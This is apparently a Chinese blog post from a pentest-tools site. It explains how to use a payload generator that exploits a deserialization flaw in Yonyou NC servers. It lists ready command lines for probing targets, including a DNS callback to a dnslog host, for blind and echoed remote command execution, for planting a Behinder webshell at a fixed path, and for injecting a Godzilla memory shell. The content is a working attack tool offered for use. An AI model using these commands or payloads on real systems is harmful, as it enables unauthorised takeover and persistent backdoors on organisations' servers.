登录
注册
首页 渗透工具 正文
  • 本文约869字,阅读需4分钟
  • 108
  • 0

用友NC反序列化漏洞payload生成

使用说明

  1. 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。

搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。

  1. 接口检查功能:java -jar nc6.5.jar http://127.0.0.1 Check

image-20220830130453464

  1. URLDNS构造链探测:java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn

image-20220830130719543

image-20220830130803567

image-20220830130825740

  1. 无回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe

image-20220830131753990

image-20220830131804456

image-20220830131717673

  1. 回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。

image-20220830131939577

image-20220830142505411

  1. 落地 webshelljava -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"

此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。

image-20220830132251387

image-20220830132618115

image-20220830132628494

image-20220830132824210

通过 java1.7落地自定义的 webshell,因为用到了动态编译,所有需要使用 jre下的 java.exe运行,否则动态编译失败。动态编译过程会提示使用了过时的 API,没有影响。

image-20220830133136817

image-20220830133235224

image-20220830133344521

image-20220830133403240

image-20220830133536619

  1. 注入内存马:java -jar yonyouNCTools.jar http://192.168.222.130 MemoryShell,注入的是一个 valve-Godzilla内存马。

image-20220830133637610

image-20220830133805235

image-20220830133847158

image-20220830134116523

温馨提示:本文最后更新于2024年3月8日 01:40,若内容或图片失效,请在下方留言或联系博主。
  • 本文作者:admins
  • 本文链接:http://caidaome.com/?post=447
  • 版权申明:除非特别说明,否则均为本站原创文章,转载或复制请注明出处。
评论
更换验证码